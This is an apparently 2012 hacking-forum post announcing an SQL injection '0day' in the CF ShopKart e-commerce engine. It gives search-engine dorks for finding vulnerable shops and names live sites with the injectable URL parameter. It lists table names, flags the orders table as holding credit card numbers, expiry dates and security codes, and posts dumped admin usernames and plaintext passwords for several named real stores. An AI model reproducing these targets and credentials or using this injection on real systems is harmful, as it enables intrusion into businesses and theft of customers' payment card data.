The_Arhitect Posted January 28, 2012 Report Posted January 28, 2012 0Day Exploit 1 - Shopping Cart. # Exploit Title: CF Shopkart Shopping Site Engine [MSAcess&MYSQL SQL Injection] 0day# Date: 12/1/12# Author: Srblche# Vendor or Software Link: http://www.webstoresltd.com/webstores.cfm and www.cfshopkart.com/# Version: v4.x.x - v5.x.x# Category:: Webapps# Google dork: inurl:.cfm?Action=ViewDetails + "Website Content for"# Tested on: Windows 7 and Backtrack## 18,600 results## EXPLOIT: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=1 [SQLi HERE]Vuln Link: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=29In Depth Analysis: Most CF ShopKart scripts runs either MSAccess or MYSQLv5 databases. However we can get through both. The admin directory is always located at /admin/This 0day was made for Srblche.---------------------TABLE [orders] CONTAINS CREDIT CARD NUMBERS, EXPIRY and SECURITY CODESTABLE [users] CONTAINS ADMIN INFOADMIN PANEL LINK WILL ALWAYS BE AT [/admin]---------------------MSACCESS HELP - [+]Table Names of CF ShopKart --categoriescheckoutheadercompanyinfocontactscustomerhistorydiscountsemaillistgallerygallerycatsgallerycommentsgallerynotesgraphicshelphomepageimagecategoriesipcountrieslinksloginsoptionsorder\_noorderdetailsorders --------------------------->> CreditCardType,CreditCardNumber,CreditCardExpire,CCConfirmationNumberpagesproductspromossalessellingareassentmessagessettingssettings2shippingsurchargesshippingtable1shippingtable2shippingtable3shippingtable4shippingtable5shippingtypesshoppingcartsstatsstats\_archivestoreheadertaxestempordersupsconfigusers ---------------------------------->> UserID,UserName,Password,UserLevelwishlistitemswishlists--------------------------------------------------------------------------------https://www.streetsourceleds.com/(secure)/admin//admin.cfmData Found: UserID,UserName,Password,UserLevel=20^admin^incentives^AdminData Found: UserID,UserName,Password,UserLevel=22^stalerico^kazoo^AdminCVV's in only some orders.--------------------------------------------------------------------------------https://www.zijagear.com/shop/admin/admin.cfmadmin:taylor12(paypal shop, no cc's found unless setting changed in options to store cc details)--------------------------------------------------------------------------------EDIT NEW DORK : intext:"Powered by CFShopKart" 1 MORE DORK: inurl:/index.cfm?carttoken=(About 317,000 results (0.37 seconds) http://www.ktlcc.com/handwsportshop.com/shop/adminadmin:taylor12=============================================================http://www.augersidekick.comColumn Data: adminData Found: username=adminLength of 'Column Data' is 10Column Data: chrisnmarcData Found: password=chrisnmarc 2 Quote